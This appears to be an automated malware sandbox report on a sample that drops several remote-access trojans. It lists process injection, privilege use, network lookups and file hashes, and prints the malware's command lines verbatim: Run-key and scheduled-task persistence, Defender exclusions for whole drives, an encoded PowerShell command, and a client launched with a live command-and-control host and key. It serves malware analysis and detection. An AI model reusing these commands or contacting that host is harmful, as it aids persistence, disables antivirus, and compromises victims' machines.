N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 808 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 808 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 808 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2416 wrote to memory of 3860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 2416 wrote to memory of 3748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 2416 wrote to memory of 3748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 2416 wrote to memory of 2908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 2416 wrote to memory of 2908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 2416 wrote to memory of 2908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 2416 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 2416 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 2416 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 2416 wrote to memory of 3772 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 2416 wrote to memory of 3772 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 2416 wrote to memory of 3772 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 2416 wrote to memory of 4432 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 2416 wrote to memory of 4432 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 4432 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4432 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3980 wrote to memory of 4524 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3980 wrote to memory of 4524 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\explorer.exe
PID 4432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\explorer.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\System32\cmd.exe
PID 4432 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\System32\cmd.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\ProgramData\$77images.exe
PID 212 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\ProgramData\$77images.exe
PID 212 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\ProgramData\$77images.exe
PID 4260 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe

"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\$77Install.exe

"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

"C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE


C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

"C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE


C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline"

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath C:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

C:\ProgramData\$77images.exe

"C:\ProgramData\$77images.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f6ecc4b9-3dd8-44cd-92c1-e74b525bf90c}

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 52.182.141.63:443 tcp
N/A 2.18.109.224:443 tcp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 93.184.221.240:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\$77Install.exe

MD5 2656bb680bc4b4a95ce5cb1443b2850d
SHA1 3033d5adc32e3df44205408dd3689670756e55a4
SHA256 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c
SHA512 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

MD5 f8169767c726f1be7a7e14839cc44d36
SHA1 571bcdb58a2017d77593ea1325bac737160b81f4
SHA256 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377
